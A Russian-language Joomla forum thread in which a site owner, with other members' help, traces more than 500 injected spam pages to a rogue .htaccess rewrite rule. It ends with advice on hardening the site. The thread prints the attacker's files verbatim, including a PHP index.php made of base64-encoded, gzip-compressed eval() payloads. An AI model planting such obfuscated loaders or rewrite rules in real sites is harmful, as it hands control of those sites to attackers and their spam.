Взломали сайт хакеры Joomla 3 - Безопасность сайтов на Joomla

Здравствуйте.
На моем сайте были установелны страницы рекламного характера (про турбослим, чай для похудения), Яндекс вебмастер показывает свыше 500 новых этих спамных страниц. Эти страницы были установлены где-то 13 февраля, я узнал про них где-то 24 февраля.

Сайт находится на хостинге Таймвеб. На эти спамные страницы были проставлены ссылки с твитера, через акаунты этих твитов, я нашел другие сайты с такой же хакерской атакой. Все они были на хостинге Таймвеб. Техподдержка Таймвеба шаблоно отписалась.

Как удалить эти страницы?  !   В базе данных я удалил файлы относящихся к этим страницам (БД redirect_links), страницы остались.

Как удалить эти страницы?

.htaccess проверял ?

Все они были на хостинге Таймвеб.

Подозрительно

.htaccess посмортел, сравнил с денверским хтаксесом, обнаружил одну новую строчку:


 RewriteRule ^kiff(.*)$ /includes/js/$1 [L]


вирусные страницы начинаются с адреса http://сайт/kiff/...

kiff тут и там, значит если я удалю эту строчку в хтаксесе, удалятся эти вирусные страницы?

Страницы скорее всего просто перестанут выводится. Надо еще узнать, как ломали.

RewriteRule ^kiff(.*)$ /includes/js/$1 [L]
kiff тут и там, значит если я удалю эту строчку в хтаксесе, удалятся эти вирусные страницы?

Смотри что в папке по пути /includes/js/
Правило редиректа конечно удаляй

в папке по пути /includes/js/ два файла:

     .htaccess и Index.php.

в .htaccess написано только это:

     RewriteEngine On
RewriteBase /kiff

RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f

RewriteRule .* index.php

в Index.php написано:

<? eval(gzuncompress(base64_decode('eF6NUl1rwkAQ/Ct9KJyBUvxoxEPyYB9yPgjFKyQ2RUJyOVCb0qK0Nf763txalXonvsws7Mxmdi+3YvL0OJo8v7Kch/1BJxyEYc7m0Wi9LppWWWx0/yGvtPqodIupXrJkN/eGgRLQsODun+rFdpOmjMH8s3yv2y6VUUAQ8102k99qPI3cKohKowL7lcVYtlXMlxVkKaAGbKwr5tsqpVQaNAVEBP78x3SoLiQ06aDYZcBLu9DFsA/NvsaF7qmTrvp3M98OqXyzL9XdLogXtULxE/m/cbh0NkNl5oOcqdAgF93qZKdaC5t2de5SPWmVSpjXdM7c/1mNUdjbuGf4/YVI7L6Z2Oc699vU8piY0n6xIBj+AgSy1RM='))); ?><? eval(gzuncompress(base64_decode('eF6Njs1qg1AQhV8lCyEKXVxtTZHgwtSMtohNrs6glhL8uQHRaLAaCCXvXrWLdtfCLIbvzJlzjkOT92XbLA76o36vGaquy1KpfEqpaXVdepWXWBEnpJDAIKwqc3m3DIAjgmGH2xrCmh8Dsv7GccSSHdbFBisOHAwnVJ//IY/xfqhyiBhsOcwoPkEp9ua0pi5nud1ePC05Zy6tvOZF9bT+nJziWY5+Nwg4JjD+C34QIaNgfO1y1HEyOLNvnNfrbN195+w1YygcGoonFUW0qUfk2xab+mnEPPQv2ZQ6HSvrTvRD1yyy9EOsHg6FyNtCyFL6JpXvyvr2BVs5a5w='))); ?><? eval(gzuncompress(base64_decode('eF6Nk1FvmzAUhf8KrSwVa4xgwECGXClLnTZaBBWQvUTIQgyUaluIKDxUbf77rtNqgzaO9oAsuOc7+B5fI2ExdLuKv85W6eZKTKkXEBpQKq7yjZXrSKQ8+c6TjaA+dewpoVS3cG60Tb/7oVufbJPKB+MQCaI0IrkuBTa73Hbd/stkUjZ15Zvlvvi8L8rtz8Js+wkS1mX4UOsX1e9993TyzwTnGCPhsFNFG+dh9euxOm/hnLNw3yw0lYCCAAmXFW1bPOmDgofZ9eDVx8bgLYAiOEIEinxsGTQx5utkFd9nAhYD0lLrnbH+Pk6zxZKvblJDRbiScLHako4tE56tkyhLZlG64InRtX2lZr33LCAAnQpwCvErffx3MQA+u+VRdtKJWOesgrHVHZ/d8GSxjubZMo6GZ0MIhDIcmXkcf1tyjJ+RoGwohPOom7aCef2r0opHGBVPY9ew+PgZfICC8aLmCJVHL79JrTksuFgzVS1MZQs+Dg/KW2WNm3zdkyF3EB6qcttoSpIcSWio35XdQ7PTtvXRCongtQsVeJzUYBQgXP4LxuoC7s3LixJ0PoLef4HuR9D/B2IldxzoAIdt1fXtTh2F96Y7/AEfHFDZ'))); ?>

 код басе64 расшифровывает китайскими иероглифами (сайт /base64.ru/)   На денвере папки js нету.

Получается, если удалю папку js, то я избавлюсь от вируса полностью?

Короче, удалил эту папку.


Спасибо за помощь, а то не знал что делать! 

Скажите, пожайлуйста, а какая цель у этих хакеров? Вроде ссылок на другие сайты они не ставили.

Чего они добиваются таким способом?

Скажите, пожайлуйста, а какая цель у этих хакеров? Вроде ссылок на другие сайты они не ставили.

Чего они добиваются таким способом?

Если у вас есть тИЦ на сайте, то это хорошая площадка для продвижения ДОРОВ, т.е дорвейщик, оптимизирует страницы под SEO, и выдвигает торговое предложение какой либо конторы, и при прогонах по определенным площадкам, эти страници занимают на какое то время топовые места по запросу в ПС, есть техники еще слива трафа, если от 1к уников в сутки, то вы тоже потенциальный клиент для взлома... если ведете коммерческую деятельность, то конкурентов может заинтересовать ваша БД. в результате обращаются к хакерам, ту можно много аспектов привести...

если ведете коммерческую деятельность, то конкурентов может заинтересовать ваша БД

Подскажите как обезопасить себя?

Регулярно обновляйте Joomla, дополнения ставьте только с Joomla.org, шаблоны только с официальных сайтов, делайте регулярную резервную копию (откатиться в 100 раз проще, чем лечить сайт)
Защищайте свой компьютер, часто ломают украв пароль от ftp с вашего компьютера. Нужен хороший антивирус и не сохраняйте пароли в ftp-менеджерах.

Подскажите как обезопасить себя?

Закройте админ, поставьте капчу, поставьте компонент защиты, закройте загрузку левых файлов в папку имедж и самое главное если не умеете лечить вирусы: НИКОГДА НЕ СТАВЬТЕ ВАРЕЗНЫЕ РАСШИРЕНИЯ

Закройте админ, поставьте капчу, поставьте компонент защиты, закройте загрузку левых файлов в папку имедж и самое главное если не умеете лечить вирусы: НИКОГДА НЕ СТАВЬТЕ ВАРЕЗНЫЕ РАСШИРЕНИЯ

Админку закрыли.
Капчу думал поставить, но для интернет магазина это имеет большой минус - клиенты, возраст которых около 30 лет, не ладят с компьютерами (основная часть) и порой лишнее поле для заполнения создает им проблему, из-за чего значительно падает количество заказов.
По поводу компонентов защиты - что посоветуете ставить?

Защищайте свой компьютер, часто ломают украв пароль от ftp с вашего компьютера. Нужен хороший антивирус и не сохраняйте пароли в ftp-менеджерах.

Спасибо за совет.
Действительно без антивируса никак, но и это не гарантия. Ставил несколько самых популярных и это не спасало (без названия, антирекламой не буду заниматься)

Несколько самое то ставить

VPS+ClamAv

Несколько самое то ставить

имею ввиду подряд, а не одновременно!